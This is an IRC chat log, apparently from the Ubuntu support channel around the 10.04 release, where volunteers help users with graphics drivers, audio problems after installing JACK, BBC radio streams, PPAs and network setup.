
EuthanatosTruth is I'mjust an old-skewl noob rofl00:00
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stucki_bnUboon2Age: yes! and the problem is the low vertical resolutoin and the chipset (see above, via...)00:00
switchgirlanyone else noticed that bbc are fading out on real media streams? http://www.bbc.co.uk/blogs/radiolabs/2009/10/realmedia_an_update.shtml it's a shame as i enjoyed listening to the streams from rhythmbox - the only option is wma and that's unsupported in Linux - how can i play wma00:01
stucki_bswitchgirl: I'd try e.g. 'vlc'00:03
switchgirlstucki_b, still unsupported00:03
EuthanatosI have a seemingly absurd problem I've never encountered before ever.  When clicking on a text box it often does not initialize typing into that window even though I see a cursor.  I JUST now noticed that (Despite seeing the bnlinking cursor in the RIGHT text box) it typed into the wrong box while it SHOULD be typing in another.  Specifically it input to xchat while it should be inputing to a text box in chrome.  Is this known?00:04
Euthanatos [Lucid64]00:04
Euthanatosswitchgirl, i doubt wma will ever be offically supported...like wine00:05
nUboon2Agestucki_b: so if you do 'lspci | grep raphics'  what does it say?00:06
switchgirlEuthanatos, i want and need anyway of listening to wma radio00:06
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risperdalhi there00:07
stucki_bnUboon2Age: 00:01.0 VGA compatible controller: VIA Technologies, Inc. VX800/VX820 Chrome 9 HC3 Integrated Graphics (rev 11)00:08
Euthanatosswitchgirl, not that i can helpyou, but what radio are you listening to that is using outdated, high bandwidth, proprietary protocols?00:09
switchgirlbbc radio 4 - used to play perfectly in rhythmbox00:09
VvWolverinevVhi, can anyone tell me if the software center sorts search results by popularity?00:10
Euthanatosoh bbc.....sad that that actually makes sense00:10
acerimmerVvWolverinevV: dont' think so00:10
nUboon2Ageswitchgirl: Don't know if this helps but according to some web discussion mplayer and Xine can play wma.00:10
VvWolverinevVthanks acerimmer00:10
Euthanatosill test it00:10
imprintI keep getting error trying to configure rackarrack, and the same with jack, what to do?00:11
VvWolverinevVcan anyone tell me how to revert to add/remove programs instead of software center then??00:11
acerimmerVvWolverinevV: sudo apt-get remove or apt-get install packagename00:11
VvWolverinevVacerimmer: okay, do you know the package name for "add/remove programs"00:13
Euthanatosswitchgirl, comes in fine through chrome for me =/00:13
nUboon2Ageswitchgirl: but might need their proprietary codecs installed... (hope that info is correct/helpful)00:13
switchgirlEuthanatos, mplayer says no, vlc and rhythmbox the same :s00:14
acerimmerVvWolverinevV: really software center is where you should start.  Then synaptic package manager.  but if you INSIST on using the command line, first find the package name you're after and then use it with your apt-get command.  Be aware, if you don't know what you're doing you could break your system.  just sayin'...00:14
Euthanatosswitchgirl, i'm running it out of flash and chrome00:15
Euthanatosis there something about this option that doesn't work fo royu?00:15
Euthanatosi imagine FF would handle it just fine too00:15
VvWolverinevVacerimmer: thanks but i think you are misunderstanding my question; i would like to use the "add/remove programs" GUI instead of the software center GUI00:15
duffydackswitchgirl, dont the bbc radios play from the browser ?00:16
Euthanatosduffydack, that's what I'm doing00:16
VvWolverinevVacerimmer: for the sole purpose of sorting search results by popularity00:16
Euthanatoscomes in fine with flash browser plugin00:16
Euthanatosnot that i can understand a single british word00:16
nUboon2Agestucki_b: it looks like this machine might be using the same chipset and having similar probs: http://wiki.archlinux.org/index.php/Samsung_NC2000:16
marko_Is anyone having problems with Compiz and 3D games? I wrote a little workaround script that needs testing...00:16
switchgirlduffydack, yes but i want to use it as a relaibale alarm clock- flash has in the past bricked randomly00:17
duffydackEuthanatos, switchgirl works for me...00:17
Euthanatoswhich is odd because I can clearly understand Sir Hunphrey says =/ lol00:17
duffydackswitchgirl, buy an alarm clock lol00:17
VvWolverinevVacerimmer: do you know what i mean when i say add/remove programs GUI?  the one that came with ubuntu 9.04 and earlier00:17
EuthanatosYeah duffydack seems fine to me here too00:18
Euthanatosotherthan the accent00:18
nUboon2Agestucki_b: says "Xorg using openchrome driver, VESA caused segmentation fault on X startup "00:18
EuthanatosAnd boy...that'll be the day...accent & dialect real-time translation software rofl00:18
SegFault|LaptopAnyone still having the staticy left channel problem? (Sound)00:19
drippingguttersRunnin' Lucid, intel 845, stock drivers are crashy, xorg/kms both fail to properly detect this Dell P780's resolutions/refresh, but that would normally be overrideable; using xorg-edgers fixes the crashing, but the newer intel drivers require kms... and I can't override that, so what do?00:19
stucki_bnUboon2Age: yes, lspci is same thing, but no segfault :-)  X11 is running fine! BUT it is NOT running as 'via', but as 'vesa'.  And the Mode of the text-consoles collide with it.00:20
shiba_hey, i have a question about Ubuntu Netbook remix, if any one can help.00:23
drippingguttersShould I file a bug? Using what summary? :/00:23
stucki_bnUboon2Age: and b.t.w, all setups in xorg.conf (those I had from the old system) do crash because of missing 'via'. Only *empty* xorg.conf *works* (so the xorg-server finds out alone, but disagrees with the kernel and framebuffer I think)00:23
ActionParsnipYo yo yo00:23
test34A new thing appeared in my notification area, it looks like a button?00:23
nUboon2Agestucki_b: there is some info about trouble w/ the openchrome driver.  And here is a suggested solution...00:24
shiba_is there a set of themes for Netbook remix on synaptic manager?00:24
booleancatHmm... I'm having some issues with multiple monitors. When I plug my laptop into my docking station, it correctly moves the display to the dual-monitor setup attached to the docking station, but they're cloned and not extended. Any way to make it automatically extend?00:26
demifurorhi guys, does anyone have an easy guide to follow on how to make a disk mount automaticallt at startup?00:26
ActionParsnipShiba_: not that I'm aware of. If you install tinymenu and liquifox you can make firefox thinner (assuming you use firefox)00:26
stucki_bswitchgirl: where do you get 'wma' ? (inside the flasplayer is see on bbc?)00:26
duffydackswitchgirl, I cant seem to get rhythmbox to play it..  how are you setting this 'alarm'00:26
ActionParsnip!fstab | demifuror00:26
ubottudemifuror: The /etc/fstab file indicates how drive partitions are to be used or otherwise integrated into the file system. See https://help.ubuntu.com/community/Fstab and http://www.tuxfiles.org/linuxhelp/fstab.html and !Partitions00:26
shiba_Action: i use Chrome00:26
ActionParsnipShiba_: good choice. No need then :)00:26
shiba_i just wanted a few more options00:27
nUboon2Agestucki_b: http://paste.ubuntu.com/449410/00:27
switchgirlduffydack, via gnome alarm applet and getting it to run the command rhythmbox --url= (the bbc url)00:27
switch10booleancat: do you have compiz enabled?00:27
booleancatswitch10: Yes00:28
imprinthow do you configure the rakarrack guitar program to run?00:28
ActionParsnipShiba_: you can install globalmenu. It makes the file, edit etc menus go into the top bar00:28
switch10booleancat: compiz has a max res that will mess with dual monitors set up side by side.  try stacking them...00:28
risperdaldoes anyone have ati radeon 46xx ?00:28
shiba_i was looking for something like that.00:29
booleancatswitch10: ? so, why can I *manually* set it to extended desktop and it just works? All I want is for it to be automatic instead of manual00:29
Alexanda91I have a ATI Radeon 48xx is that close enough ?00:29
shiba_:3 i like to see my background without menus all over the place00:29
risperdalmay be00:29
risperdali have a lot of problems my ati radeon 465000:29
Alexanda91what kind00:29
switch10booleancat:  I thought you could not get it at all.  nevermind00:30
duffydackswitchgirl, try browser with http://www.bbc.co.uk/iplayer/console/bbc_radio_fourfm as url00:30
risperdalfirstly, when booting ubuntu00:30
booleancatNope, I just want it to automatically do an extended desktop instead of a clone00:30
ActionParsnipShiba_: it replaces the windows list on the bar too, makes everything a lot more compacted00:30
Alexanda91does it seem glitchy, risperdal?00:30
risperdalsorry my english is not good. i m thinking how i can explain that problems00:31
risperdalwhen i booting ubuntu00:31
stucki_bnUboon2Age: wekk, That problem I had in the *previous* setup. *NOW* the X11-Resoliton is OK!  But switsching away from X11 or during shutdownthe text-consoles show snow. So X11 has it right, but the boot/kernel/framebuffer/console-setup has the problem.00:31
risperdaljust few moments its black screen00:31
shiba_is it "Global"?00:31
risperdaland get back to normal00:31
risperdal: /00:31
Alexanda91risperdal: That is a problem with the ATI graphics drivers00:31
ActionParsnipShiba_: it manages all apps on all desktops so I guess so00:31
risperdalAlexanda91: is there anythink that i can do to solve this00:32
Alexanda91risperdal: There is no way of fixing since they're not open source. So it's all on AMD to fix the problem.00:32
risperdalati doesnt support enough linux00:32
Alexanda91I have the same problem00:32
ActionParsnipRisperdal: its why I only buy nvidia00:32
Alexanda91doesn't bother me to much00:33
shiba_trying to figure out what it's called under synaptic...00:33
risperdali will buy nvida as soon as00:33
risperdalalso i have a little problem either00:33
risperdali m enabled compiz fusion00:33
risperdalwhen i dragging windows00:33
* duffydack hugs his 1gig radeon 465000:33
nUboon2Agestucki_b: Well, one clue is that the boot and shutdown is done by Plymouth.00:33
risperdalits like00:33
Alexanda91risperdal, Tearing?00:33
bodzillagenerally with ati the generic driver works00:33
risperdalits like00:33
risperdalits very booring to me:D00:34
Alexanda91risperdal: yea I have that problem as well.00:34
risperdali think we should buy nvida00:34
duffydackthe opensource driver has no tearing, only the proprietary one..00:34
Alexanda91risperdal: Although I've minimized the problem by setting the refresh rate and enabling triple buffer00:34
foo_fighterhttps://launchpad.net/~c-korn/+archive/vlc  ..... take a look at this...that's the difference between the first ppa and the others? could anyone help?00:34
risperdali cant set refresh rate more than 60hz00:34
risperdalbut on windows00:35
risperdalit can be 75 hz00:35
stucki_bnUboon2Age: huh? Plymouth? new to me - where to read on ... ?00:35
orenwhere can i get the deb file of wicd?00:35
Alexanda91risperdal: did you enable the triple buffer?00:35
macramolehi #ubuntu !, i was mixing some stuff in ardour when i suddenly kick a wire or something and the whole system crashed.. now i've restarted but the snd_usb_audio freeze as i'm doing a #alsa reload. It does work if I use a live cd so... some configuration must be the problem00:35
Alexanda91risperdal: I mean Sync to Vblank00:35
risperdalalexanda: i dont know about triple buffer00:36
ActionParsnipOren: packages.ubuntu.com00:36
foo_fightercould anyone help me with ppa?00:36
risperdalyou mean xorg.conf00:36
Alexanda91risperdal: You have to install the compiz settings manager00:36
booleancatBah! Why is it so hard to save my extended desktop settings? All I want is for the monitors to NOT be cloned.00:36
ActionParsnipOren: you will need to download the deps too00:36
risperdalAlexanda: i have compiz settings manager00:36
tobiaszwhy is Ubuntu still unable to go with flashplayer as good as Kubuntu does?00:36
risperdalalexanda: what did you mean enabling tripple buffer00:37
orenActionParsnip: thanks00:37
Alexanda91risperdal: Open it and go to general settings then Display Settings00:37
foo_fighterhttps://launchpad.net/~c-korn/+archive/vlc  ..... take a look at this...that's the difference between the first ppa and the others? could anyone help?00:37
nUboon2Agestucki_b: the plymouth program handles the boot and shutdown splash.  I could be wrong, but I'm guessing that looking into plymouth might provide some help.00:37
Alexanda91risperdal: At the bottom you should see Sync To VBlank00:37
ActionParsnipTobiasz: works fine here in Ubuntu here00:37
uskihi; does anyone know why the 64-bit 10.04 is "not recommended for daily desktop usage" ? (http://www.ubuntu.com/desktop/get-ubuntu/download)00:37
risperdalalexanda: should i activate it00:37
nUboon2Agestucki_b: by the way, does this sound familiar: http://forum.ubuntuusers.de/topic/netbook-ecafe-ec-900-grafikporbleme/00:38
Alexanda91risperdal: yea00:38
tobiaszActionParsnip what gfx card u got?00:38
ActionParsnipUski: no idea dude. Its been asked many times00:38
eve_how do i get the password for the keyring blank in ubuntu 10.0400:38
duffydackIve also heard unticking detect outputs and detect refresh and setting them manually also helps for vsync00:38
ActionParsnipTobiasz: one is an onboard nvidia 6150 512mb. The other is an intel onboard 945 POS00:38
ubutomuski, because the average joe doesn't know about 32 and 64 bit and will get angry if installing 64 bit and it doesn'T work, 32 bit works on 64 bit systems, but the other way around not.00:38
uskiActionParsnip, thanks00:39
tobiaszActionParsnip I don't believe it goes flawlessly for you :P00:39
risperdalalexanda: i enabled it. btw there is a refresh rate option which is already set 50 hz . should i set it to higher?00:39
tobiaszActionParsnip fullscreen controls must be lagged00:39
stucki_bnUboon2Age: Plymouth?  I googled it and it definitely looks like a candidate for the problem ... !00:39
uskiubutom, well they could write "Make sure you have a 64-bit system"; the way it's written makes people feel like 64-bits is less stable and I'm not sure it's the case00:39
foo_fightercould anyone helo me with a ppa?00:39
ActionParsnipTobiasz: if you use 64bit you can use the 64 bit ppa. It uses 10.0 but is 64bit native00:39
Alexanda91risperdal: Yes set it to what your display refresh rate is.00:39
orenActionParsnip: i see on the right side links to the source. but where is the deb file?00:39
foo_fightercould anyone help me with a ppa?00:39
tobiaszActionParsnip using 32bit system atm00:39
bodzillafoo what help which ppa00:39
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ubutomuski, yeah, but they seem to aim at newcomers with that00:40
japhbHow do I write an Ubuntu install ISO to a bootable USB thumb drive, if I only have Debian systems?  Instructions to use the handy Ubuntu-specific startup disk creator are driving me mad, what with the chicken and egg and all.  :-/00:40
orenActionParsnip: maybe it's this - [wicd_1.7.0+ds1-2.debian.tar.gz] ?00:40
risperdalalexsanda: on windows : it can be 75. on ubuntu display manager it can be 60 . on compiz config settings manager it can be what i want. what refresh rate should i set?00:40
crdlbrisperdal: that's only necessary on nvidia; the refresh rate is correctly detected on other GPUs00:40
foo_fighterbodzilla:   https://launchpad.net/~c-korn/+archive/vlc  ..... take a look at this...what's the difference between the first ppa and the others? could anyone help?00:40
Jordan_Ujaphb: unetbootin00:40
Alexanda91risperdal: 75 is what I would set it to.00:41
risperdalcrdbl: you mean doesnt matter what i set00:41
risperdalalexanda: i will try00:41
NeurotiquetteBittorrent rocks. The download for ubuntu was sooo slow from the website, and so I grabbed the torrent. So much faster.00:41
risperdalups :D i set00:41
crdlbrisperdal: well, it won't matter if detect refresh rate is checked, but it should use the correct value in that case00:41
NeurotiquetteI have no idea why it was so slow. I've downlaoded from the site before and it wasn't quite as bad.00:41
shiba_sweet. thanks alot for recommending Global00:41
slimjimflimhelp! jack broke my audio :O00:41
connermcdfoo_fighter just click the technical details for PPA and choose your OS version00:41
slimjimflimi think i changed default devices or something00:41
slimjimflimit took over00:41
Alexanda91risperdal: Did it improve anything?00:41
slimjimflimi can't uninstall it00:42
connermcdfoo_fighter the green text00:42
slimjimflimi can but it's still broken when i do00:42
risperdalalexanda: yes i did what did you say correctly00:42
bodzillafoo you just have to look at whats in the pa thats the difference what are you trying to get?00:42
oreni purged network manager and now i can't connect to the internet (not even with cable). anything i can do other than getting all the deb files for wicd?00:42
risperdalalexanda: should i restart x server?00:42
rewirejaphb: try using the universal USB tool from www.pendrivelinux.com, it will make any livecd iso into a bootable pendrive00:42
slimjimflimwhen i try to watch youtube or anything, it crashes my ff00:42
connermcdfoo_fighter the rest is just a list of what's included00:42
slimjimflimcan anyone help???00:42
Jordan_Uoren: You can use ifconfig manually. Why did you remove network-manager?00:43
japhbrewire, how does that compare to the unetbootin suggested by Jordan_U?00:43
duffydackoren, use the interfaces file00:43
dwuhisHey, i install 10.04, then ran updates, and i guess the kernel got updated, so now on my grub boot menu i have 2 versions of the kernal along side windows....how cn i clean up the bootmenu?00:43
connermcdslimjimflim does it work on other browsers? could be a ff add-on00:43
Alexanda91risperdal: Yes, but before you do go to your ATI Settings and then under 3D -> More Settings -> Set your Vertical Refresh to Quality00:43
slimjimflimconnermcd: no00:43
orenJordan_U: i believe lucid is not working with broadcom that i have. so i wanted to change some stuff..00:43
orenduffydack: ok. how?00:43
slimjimflimxfce4-mixer fails too connermcd00:43
rewireMuch simpler to use, and practically automated, just an alternative. :D00:43
connermcdslimjimflim has flash ever worked? or only recently started crashing... might try a reinstall if it's worked before00:43
risperdalalexanda : uh , my catalyst center is broken. how can i do this alternative method?00:43
switch10dwuhis: you can do it through synaptic, but you should leave at least 1 old kernel in case you need to go back...00:43
bodzilladwuhis you want at least 2 kernel sets, backup kernel is the standard method00:44
slimjimflimconnermcd: it's not flash, flash worked before00:44
Alexanda91risperdal: You'll have to reinstall it00:44
foo_fighterconnermcd:  could i use this ppa ?  ppa:c-korn/vlc00:44
slimjimflimso did xfce4-mixer00:44
dwuhiscan i get rid of the 'safe modes' then?00:44
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connermcdslimjimflim could be graphics card settings?00:44
orenJordan_U: how to connect manually with ifconfig?00:44
slimjimflimconnermcd: no00:44
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bodzillafoo-fighter yes for vlc00:44
slimjimflimconnermcd: it happened when i installe jack00:44
slimjimflim*installed jack00:44
slimjimflimi was using qjackctl00:44
foo_fighterdeb http://ppa.launchpad.net/c-korn/vlc/ubuntu lucid main  deb-src http://ppa.launchpad.net/c-korn/vlc/ubuntu lucid main00:45
slimjimflimthen i changed a setting on it and it refused to open00:45
lyraeconnermcd, are you a 64 bit machine00:45
risperdalalexanda: thanks so much00:45
slimjimflimand then all my audios started crashing00:45
connermcdlyrae no00:45
Alexanda91risperdal: Did it help?00:45
risperdalalexanda: i will try that you said00:45
bodzilladwuhis yes but I forget how to do it, but having that stuff gone may not be a good idea00:45
foo_fighterbodzilla:  and these ?  deb http://ppa.launchpad.net/c-korn/vlc/ubuntu lucid main  deb-src http://ppa.launchpad.net/c-korn/vlc/ubuntu lucid main00:45
Jordan_Uoren: sudo ifconfig eth0 up && sudo dhclient eth000:45
connermcdfoo_fighter you would type deb http://ppa.launchpad.net/c-korn/vlc/ubuntu lucid main00:45
connermcddeb-src http://ppa.launchpad.net/c-korn/vlc/ubuntu lucid main00:45
orenJordan_U: thanks00:45
lyraeconnermcd, running linux 32 bit then?00:45
connermcdfoo_fighter depending on your version of ubuntu... this is assuming you're using lucid00:45
Alexanda91risperdal: Hope it works for you! It solved my problem00:45
risperdalalexanda: i will  reinstall  catalyst. i hope it help me00:45
connermcdlyrae yes00:45
Jordan_Uoren: You're welcome.00:45
lyraeok. because: http://linux.slashdot.org/story/10/06/11/1338207/Adobe-Temporarily-Kills-64-Bit-Flash-For-Linux?art_pos=200:45
risperdalalexanda: i noted your said00:46
bodzillafoo_fighter are you just trying to get the latest vlc00:46
risperdalagain thanks very much00:46
foo_fighteryes bodzilla00:46
switch10dwuhis: you can use startupmanager to remove entries from the grub list00:46
connermcdslimjimflim might look at the link from lyrae00:46
ActionParsnipOren: http://packages.ubuntu.com/lucid/all/wicd/download00:46
stucki_bnUboon2Age: Plymouth ... switching it off (kernel line with 'noplymouth') does NOT change it (only the splashscreen correctly goes away.00:46
slimjimflimconnermcd: ffs this has nothing to do with flash00:46
foo_fighterbodzilla:  could you come prive to tell you my problem?00:46
slimjimflimfor the 4th time00:46
bodzillafoo_fighter vlc always has worked whether from synaptic or appa it is well supported00:46
slimjimflimi told you00:46
connermcdslimjimflim well you said when you watch youtube... then I suggested graphics settings00:47
dwuhisswitch10, i installed startupmanager ubt i only have a drop downlist of items,  dont see a way of removing them00:47
slimjimflimconnermcd: no, that's just an example00:47
connermcdslimjimflim I mean you're welcome to cuss me out but I'm not gonna try to help you00:47
IdleOne!attitude | slimjimflim00:47
ubottuslimjimflim: The people here are volunteers, your attitude should reflect that. Answers are not always available. See http://wiki.ubuntu.com/IRC/Guidelines00:47
slimjimflimit happens when i use any audio00:47
connermcdslimjimflim Ah, I see00:47
slimjimflimi'm just really frustrated right noww00:47
ActionParsnipDwuhis: if you remove unnecessary kernels it will tidy up grub for you00:47
slimjimflimand #jack can't help me either00:47
bodzilladwuhis startup manager is okay but additional kernesl will move and the line start wont00:47
ChaosrattAnyone else getting " * /dev/null is not a character device!" error after the most recent SSH package update?00:48
slimjimflimor refuse to00:48
risperdalalexanda91: my catalyst wasnt broken. i m trying right now. i need restart computer. see u later00:48
slimjimflimnever ever install jack...not stable00:48
connermcdslimjimflim have you looked at the jack config wiki? https://help.ubuntu.com/community/HowToJACKConfiguration00:48
Phil2010I fixed my res proplem.00:49
stucki_bnUboon2Age: So if Plymouth is out of the picture, it can only be the framebuffer defined in the kernel/initramfs that says: vga16fb: initializing // fb0: VGA16 VGA frame buffer device // Console: switching to colour frame buffer device 80x30.00:49
slimjimflimconnermcd: yea it says to run qjackctl00:49
Phil2010It was my integrated video being to crappy to upscale with Openchrome - 16:9 It works perfectly with my CRT.00:49
slimjimflimconnermcd: qjackctl is what is causing the problem in the first place00:49
slimjimflimi can't open it00:49
slimjimflimit crashes00:49
Alloeishusdoes anybody know of a ubuntu program that I can create/print paystubs/00:50
slimjimflimconnermcd: it happened when i changed the realtime setting00:50
ActionParsnipOowriter maybe, or gedit00:50
Cinnamoni need help i have no sound00:50
slimjimflimi unchecked it00:50
ActionParsnip!sound | cinnamon00:50
ubottucinnamon: If you're having problems with sound, click the Volume applet, then Sound Preferences, and check your Volume, Hardware, Input, and Output settings.  If that fails, see https://help.ubuntu.com/community/Sound - https://help.ubuntu.com/community/SoundTroubleshooting - http://alsa.opensrc.org/DmixPlugin - For playing audio files,  see !players and !mp3.00:50
slimjimflimi had also been playing w/ the input/output device settings connermcd00:50
connermcdslimjimflim did you check to make sure your hardware is supported?00:51
Cinnamonk thanks00:51
slimjimflimconnermcd: it was working before i installed jack00:51
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makdissemy dhcp-server only give an ip to listed mac addresses, but if someone put a static ip it will be able to access the net, there is a way to block this?00:51
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slimjimflimi've recorded and played back many times00:51
slimjimflimnever any issues00:51
slimjimflimuntil jack00:51
stucki_bnUboon2Age: May be, the framebuffer, as it is configured, forces the card to 800x600 on the (really)800x480 Screen.  THAT was happening to older X11-Drivers.  The Chipset knows such a resolution, but has problems to shrik it onto the smaller screen.00:51
ActionParsnipMakdisse: you may be able to only allow certain mac addresses. These can be spoofed but are hard to guess.00:52
slimjimflimi really need my audio working...i'm a musician00:53
Phil2010slimjinflim: unmute your audio.00:53
Phil2010Install neccicary codecs.00:53
slimjimflimPhil2010: i can't because xfce4-mixer crashes00:53
slimjimflimall i have is alsa00:53
slimjimflimwhenever i try to play any audio that app crashes00:54
ActionParsnipSlimjimfilm: alsamixer in terminal not work?00:54
slimjimflimActionParsnip: yes that works00:54
ActionParsnipBut is it useful?00:54
Jupdownwhat ur audio card?00:54
makdisseActionParsnip: how can i allow only certain mac address? the host declaration dont block mac addresses, it only release an ip to those macs...00:54
stucki_bnUboon2Age: **OOPS** it 1:48AM now in Berlin, have to hurry to catch some sleep, to i'm forced to stop  --- thanks for trying and for the hints! // BY-in-a-hurry, Stucki00:54
VigoIs the Flash 10.1rc available in the repositories or should I just leave any of that off because of the security issues?00:55
ActionParsnipMakdisse: depends on the software used. I believe iptables can do stuff like that?00:55
ChaosrattAnyone having issues with SSH on 10.4 after the recent update?00:55
slimjimflimJupdown: Multimedia audio controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller (rev 01)00:55
Jupdownoh oh me00:55
JupdownI was00:55
Jupdownwith my anime server.... but after setting the port to 2000:55
ActionParsnipVigo: flashplugin-nonfree installs 10.100:55
Jupdownand forwarding ports 20, 21 and 2200:55
JupdownI solved the issue...00:55
slimjimflimJupdown: it's not that the card doesn't work though00:56
slimjimflimthe card is fine00:56
Jupdownso what is your issue?00:56
slimjimflimit's jack that screwed up my pulseaudio i  think00:56
slimjimflimi have no sound00:56
slimjimflimi can't open any audio app00:56
Jupdownlike you cant open the volume control?00:56
VigoActionParsnip: That is the affected one, I think, I guess I will fetch the rc and RYO it.00:56
slimjimflimor if i go to youtube, ff crashes00:56
ActionParsnipChaosratt: if you search for the error you are getting, you will find guides00:57
kassiusanyone knows why the gtk-recordMyDesktop records with 4pixels left from the height size?00:57
slimjimflimthis wasn't happening before i installed jack00:57
slimjimflimeverything was fine00:57
ActionParsnipChaosratt: i'd help but my web is painfully slow00:57
Jupdowncan you roll back the install?00:57
slimjimflimi did00:57
slimjimflimdidn't fix it00:57
Jupdownwhat version of ubuntu u runnin?00:57
Jupdownx64 or 32?00:58
Jupdownso once again00:58
Phil2010I am on 10.04 slimjimflim and I have no issues with Audio or nothing00:58
Jupdownyou installed drivers for an audio jack00:58
Jupdownit messed up your audio00:58
Jupdownand now you cant seem to roll back00:58
Jupdownor when you did it did nothing....00:58
kassiushey guys please anyone knows why the gtk-recordMyDesktop records with 4pixels left from the height size of my whole screen?00:58
slimjimflimi installed jack audio00:58
slimjimflimdrivers aren't the issue00:58
slimjimflimjack audio is an audio server00:59
Jupdownoh ok00:59
slimjimflimand it screwed everything else up00:59
FloodBot2Jupdown: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.00:59
Jupdownhmm ive got no idea man...00:59
slimjimflimya i know00:59
ChaosrattActionParsnip: http://ubuntuforums.org/showthread.php?p=9456699#post9456699 i started a thread about it00:59
Jupdownim honestly a linux noob myself00:59
jgws1looking for a ftp server recommendation00:59
Jupdownjust got 10.04 on my netbook today...00:59
ActionParsnip!ftpd | jgws101:00
ubottujgws1: FTP servers: ftpd, proftpd, pure-ftpd, twoftpd, vsftpd, MuddleFTPd, wzdftpd - Graphical front-ends: PureAdmin, GProftpd (for GNOME), KcmPureftpd (for !KDE) - See also !FTP01:00
* slimjimflim acts surprised01:00
ChaosrattActionParsnip:  my error seems to be part of the /etc/init.d/ssh script, which means the results from searching are stuffed with posts of people posting configs for other problems01:00
slimjimflimanybody here know anything at all about jack audio?01:00
ActionParsnipJgws1: openssh-server will allow you to transfer files securely. Ftp is not secure01:00
booleancatOk, so I got a script set up to properly change the screen settings. How can I go about attaching it to a hal event or something when the laptop docks?01:00
slimjimflimActionParsnip perhaps?01:00
Jupdownim assuming you have tried googling the issue?01:00
slimjimflimJupdown: please don't try to help01:01
ubottuIf you're having problems with sound, click the Volume applet, then Sound Preferences, and check your Volume, Hardware, Input, and Output settings.  If that fails, see https://help.ubuntu.com/community/Sound - https://help.ubuntu.com/community/SoundTroubleshooting - http://alsa.opensrc.org/DmixPlugin - For playing audio files,  see !players and !mp3.01:01
ubottuSome programs to capture your screen are recordmydesktop, Istanbul, Wink, Xvidcap, pyvnc2swf.  Also see https://wiki.ubuntu.com/ScreenCasts.01:01
ubottuFTP clients: Nautilus (Places -> Connect to server), gFTP, FileZilla (for !GNOME); Konqueror, Kasablanca, KFTPGrabber (for !KDE); FireFTP (for Firefox); ftp, lftp (for !cli) - See also !FTPd01:01
kassiushey guys please anyone knows why the gtk-recordMyDesktop records with 4 pixels less from the height size of my whole screen?01:02
kassiusi mean anybody01:02
slimjimflimty Cinnamon01:02
Cinnamonwhat did i do01:03
slimjimflimCinnamon: linked me01:04
k-radmy volume control applet is missing and i'd really appreciate if someone can lend me a hand getting it back01:05
Cinnamonwere is the volume applet01:05
=== Yahweh is now known as poutine
JackWaughThere's a method to add applets to the bars.01:05
k-radit is missing.  i do not know why it is missing.01:06
JackWaughRight click, add to panel.01:06
k-radwhen i try to add an applet volume control doesn't show up01:06
switch10k-rad: right clink on panel>add to panel> indicator aplet01:06
booleancatIt's the indicator applet01:06
k-radthere it is :)01:06
k-radthank you01:06
Alloeishusdoes anybody know of any office software that can create and print paystubs?01:07
foo_fightercould anyone help me with a ppa?01:07
Daekdroomfoo_fighter, hm?01:07
j800ris there any way to close Evolution to the notification area (where Empathy and Gwibber group)01:08
JackWaughHow many paystubs do you want to put out per month?01:08
ubottuA large amount of the first questions asked in this channel start with "Does anyone/anybody..."  Why not ask your next question (the real one) and find out?01:08
Daekdroom!pm | foo_fighter01:09
ubottufoo_fighter: Please ask your questions in the channel so that other people can help you, benefit from your questions and answers, and ensure that you're not getting bad advice. Please note that some people find it rude to be sent a PM without being asked for permission to do so first.01:09
JackWaughWhat's a "ppa"?01:10
DaekdroomPersonal Package Archive, JackWaugh01:10
DaekdroomIt's a Launchpad feature that allows you to have your own repositories.01:10
switch10j800r: no.  you could install a program that will dock any program, but it makes a new icon, it doesn't use the existing messaging icon01:10
Cinnamontheres a red dot on my sound applet is the good or bad01:10
foo_fighterDaekdroom:  i installed these ppa01:10
foo_fighterdeb http://ppa.launchpad.net/c-korn/vlc/ubuntu lucid main01:10
foo_fighterdeb-src http://ppa.launchpad.net/c-korn/vlc/ubuntu lucid main01:10
foo_fighterhave i to put the signing key Daekdroom?01:11
ubottuA Personal Package Archive (PPA) can provide alternate software not normally available in the offical Ubuntu repositories - Looking for a PPA? See https://launchpad.net/ubuntu/+ppas - WARNING: PPAs are unsupported third-party packages, and should be used at your own risk.01:11
foo_fighterDaekdroom:  the link is here   --->   https://launchpad.net/~c-korn/+archive/vlc01:11
Daekdroomfoo_fighter, not necessarily. If you add the PPA with add-apt-repository, it'll automatically get you the key.01:11
switch10j800r: When I used to use evolution, I just left it on a different desktop, and tried to forget about it.01:12
foo_fighterok Daekdroom01:12
j800rswitch10, it kinda sucks, cause a mail client is useless to me unless i can get real-time notification. otherwise i might as well use webmail01:12
foo_fighterthnx Daekdroom01:12
Daekdroomfoo_fighter, but if you don't put the signing key, you'll get a few warnings on apt and synaptic, nothing much01:12
JackWaughIs Chrome updated via a PPA?01:12
DaekdroomNo problem.01:12
j800rand i've done that in the past, but this is only a pentium 401:12
DaekdroomThere is a Chromium PPA, JackWaugh01:12
JackWaughI mean Google Chrome, the new browser.01:12
j800rJackWaugh, Chromium browser is in the main repository. there's no need to use a PPA01:12
foo_fighterDaekdroom:  it's not necessary uh?01:12
histoI'm trying to figure out why web pages take so long to load in linux vs. windows?  I have two laptops both on the same network. The ubuntu laptop takes about 10 seconds to load google.com when the windows machine loads it in 2 seconds??? This is after clearing the cache on both machines.01:12
Daekdroomfoo_fighter, Not necessary. It'll still work. Only warnings.01:13
timyhacis there a HowTO to set up 3 monitors using xinerama for nvidia anywhere?01:13
foo_fighterok Daekdroom01:13
Jupdownthey both same specs?01:13
Daekdroom!info chromium01:13
ubottuchromium (source: chromium-bsu): transitional dummy package for chromium-bsu. In component universe, is optional. Version 0.9.14-1 (lucid), package size 13 kB, installed size 40 kB01:13
j800rwrong option01:13
j800r!info chromium-browser01:13
ubottuchromium-browser (source: chromium-browser): Chromium browser. In component universe, is optional. Version 5.0.375.38~r46659-0ubuntu0.10.04.1 (lucid), package size 11558 kB, installed size 38424 kB01:13
JackWaughhisto:I assume both machines have the same kind of link to your router.01:13
j800rthere you go01:13
j800rthere's also a shooter game called Chromium bsu, it can get a little confusing01:14
BluesKaj!info google-chrome01:14
ubottuPackage google-chrome does not exist in lucid01:14
j800rBluesKaj, look up bud01:14
j800rdownload Chromium browser, it's virtually identical to Google Chrome, except Open Source, and maybe a little more stable01:15
histoJackWaugh: yes both are wireless01:15
JackWaughhisto: Have you checked whether the Linux system is thrashing?  Whether there is anything running on there that is chewing up the CPU time?01:15
histoJackWaugh: it makes no sense at all. I've disabled ipv6 ont he linux system etc..01:15
